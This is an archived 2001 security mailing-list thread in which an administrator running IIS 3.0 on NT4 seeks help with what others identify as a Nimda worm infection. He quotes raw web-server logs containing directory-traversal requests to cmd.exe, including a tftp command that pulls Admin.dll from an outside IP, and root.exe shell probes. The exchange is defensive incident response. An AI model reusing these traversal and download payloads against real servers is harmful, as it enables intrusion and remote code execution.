RE: [RE: [RE: Any leads?]]

From: dldean (dldean@private)
Date: Fri Sep 21 2001 - 15:04:30 PDT

  • Next message: victoria.evans@private: "RE: [RE: [RE: Any leads?]]"

    Mike,
    
    Sorry for the broken link, here is a working one,
    http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/
    website/defendwb.asp
    
    I believe that IIS rel 3.0 is not a very well support release and that you
    should probably consider upgrading to something a little more current. NT 4
    at the sp3 level also has many other security issues.
    
    Doug
    
    
    > -----Original Message-----
    > From: owner-crime@/var/spool/majordomo/lists/crime
    > [mailto:owner-crime@/var/spool/majordomo/lists/crime]On Behalf Of dldean
    > Sent: Friday, September 21, 2001 2:47 PM
    > To: J.Michael Cuciti; Kuo Jimmy
    > Cc: crime@private
    > Subject: RE: [RE: [RE: Any leads?]]
    >
    >
    > Mike,
    >
    > Here is a good starting place
    >
    > http://www.microsoft.com/technet/treeview/default.asp?url=/technet
    > /itsolutio
    >
    > This link is for a Microsoft TechNet page describing security
    > issue for web
    > sites. They also have a "batten down the hatches" script for IIS but I
    > cannot find the url for that page.
    >
    >
    > Doug
    > > -----Original Message-----
    > > From: owner-crime@/var/spool/majordomo/lists/crime
    > > [mailto:owner-crime@/var/spool/majordomo/lists/crime]On Behalf Of
    > > J.Michael Cuciti
    > > Sent: Friday, September 21, 2001 2:33 PM
    > > To: dldean; Kuo Jimmy
    > > Cc: crime@private
    > > Subject: Re: [RE: [RE: Any leads?]]
    > >
    > >
    > > Yes, I am 206.98.124.52.  The ADMIN.DLL file was deleted and the
    > > directories
    > > the event view is referencing do not exist on my system. I have
    > > followed all
    > > instruction for removal from variuos postings from CRIME.  No
    > > file refernced
    > > in posting are on my system.
    > >
    > > Do any of you know how I might stop this attack?
    > >
    > > -Mike
    > >
    > >
    > >
    > > dldean@private (dldean) wrote:
    > > This is 206.98.124.52 receiving get requests for the admin.dll from
    > > 206.98.79.246  and directory requests for his machine from
    > > 206.252.224.50 &
    > > 208.238.181.162 .
    > >
    > > Doug
    > >
    > > > -----Original Message-----
    > > > From: owner-crime@/var/spool/majordomo/lists/crime
    > > > [mailto:owner-crime@/var/spool/majordomo/lists/crime]On Behalf Of Kuo,
    > > > Jimmy
    > > > Sent: Friday, September 21, 2001 2:06 PM
    > > > Cc: crime@private
    > > > Subject: RE: [RE: Any leads?]
    > > >
    > > >
    > > > Oh, I didn't notice the followup questions you asked the first time.
    > > >
    > > > I don't know about the structure of your logs.  But are you
    > > 206.98.124.52?
    > > >
    > > > Could someone who reads IIS logs say if this is him sending
    > or receiving
    > > > GETs?
    > > >
    > > > And this is definitely Nimda.  I just don't know if you're the
    > > > target or the
    > > > culprit.  If you haven't upgraded, I'm tempting to believe
    > > you're infected
    > > > and attacking others.  The TFTP command shows up only on or after
    > > > infection.
    > > > And ADMIN.DLL (Nimda is admin spelt backwards) is also something
    > > > that shows
    > > > up after infection.  But then you say you don't have it...
    > > >
    > > > Jimmy
    > > >
    > > > > -----Original Message-----
    > > > > From:	J.Michael Cuciti [SMTP:mcuciti@private]
    > > > > Sent:	Friday, September 21, 2001 1:44 PM
    > > > > To:	Kuo Jimmy; Crispin Cowan; Jimmy Sadri
    > > > > Cc:	crime@private
    > > > > Subject:	Re: [RE: Any leads?]
    > > > >
    > > > > All:
    > > > >
    > > > > I still have a script trying to run, but the location and
    > > folder doesn't
    > > > > exist.  The is what I found in my log file:
    > > > >
    > > > > 206.98.79.246, -, 9/18/01, 7:29:26, W3SVC, WWW,
    > > 206.98.124.52, 150, 151,
    > > > > 304,
    > > > > 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe,
    > > > > /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20c:\Admin.dll,
    > > > >
    > > > > 206.98.79.246, -, 9/18/01, 7:29:27, W3SVC, WWW,
    > > 206.98.124.52, 180, 151,
    > > > > 304,
    > > > > 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe,
    > > > > /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20d:\Admin.dll,
    > > > >
    > > > > 206.252.224.50, -, 9/18/01, 7:29:33, W3SVC, WWW,
    > > 206.98.124.52, 10, 72,
    > > > > 273,
    > > > > 403, 5, GET, /scripts/root.exe, /c+dir,
    > > > >
    > > > > 206.252.224.50, -, 9/18/01, 7:29:38, W3SVC, WWW,
    > > 206.98.124.52, 80, 96,
    > > > > 1652,
    > > > > 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
    > > > >
    > > > > 208.238.181.162, -, 9/18/01, 7:29:46, W3SVC, WWW,
    > > 206.98.124.52, 10, 97,
    > > > > 243,
    > > > > 500, 123, GET, /scripts/..A../winnt/system32/cmd.exe, /c+dir,
    > > > >
    > > > > If anybody knows what this is, please 'spain it to me.
    > > > >
    > > > > I am running IIS 3.0, NT4.0 w/sp3 (haven't ungraded, I
    > > > inherited this, not
    > > > > my
    > > > > fault :-) )
    > > > >
    > > > > In the event log I see this same type of message running every few
    > > > > minutes.
    > > > > The script is supposedly running from
    > > > > \winnt\iisadmin\Scripts\..%5c..\admin.dll.  This does not exist.
    > > > >
    > > > > Thanks...
    > > > >
    > > > > Mike Cuciti
    > > > > Network Service and Support MAnager
    > > > > Tuality Healthcare
    > > > > 681.1749
    > > > >
    > > > >
    > > > > "Kuo, Jimmy" <Jimmy_Kuo@private> wrote:
    > > > > >The Melissa author was caught because he posted the infectious
    > > > document
    > > > > >from his own AOL account to a news group, rather than releasing it
    > > > > >through a hacked account. His guilt was confirmed when the
    > > > serial number
    > > > > >in the document matched the PC in the dumpster outside his
    > > bedroom :-)
    > > > >
    > > > > No.  He used a hacked acct.  But we identified the exact time
    > > of the use
    > > > > of
    > > > > the acct (newsgroup posting message ID) and the FBI traced the phone
    > > > > records.
    > > > >
    > > > > And the PC was destroyed and never located.
    > > > >
    > > > > Where did you get your version of the story?
    > > > >
    > > > > >But Code Red and its derivatives is not an Office document, and
    > > > > >therefore has no serial numbers. That investigators appear
    > to have no
    > > > > >leads months after Code Red appeared tells me that it was likely
    > > > > >released to the wild from a compromised machine, or perhaps
    > > > > >simultaneously released from multiple compromised machines. If the
    > > > > >author(s) were good, then those compromised machines were initially
    > > > > >attacked from other compromised machines. Likely all of
    > these initial
    > > > > >release vector machines have long since been wiped and
    > > > re-installed, and
    > > > > >the links to the author(s) have been cut.
    > > > >
    > > > > We have some "first instances" of traffic.  I don't know what
    > > the FBI's
    > > > > doing with the information gathered so far.  But I agree that it's
    > > > > difficult
    > > > > and not likely.
    > > > >
    > > > > Jimmy
    > > >
    > >
    > >
    > >
    >
    >
    



    This archive was generated by hypermail 2b30 : Sun May 26 2002 - 11:25:49 PDT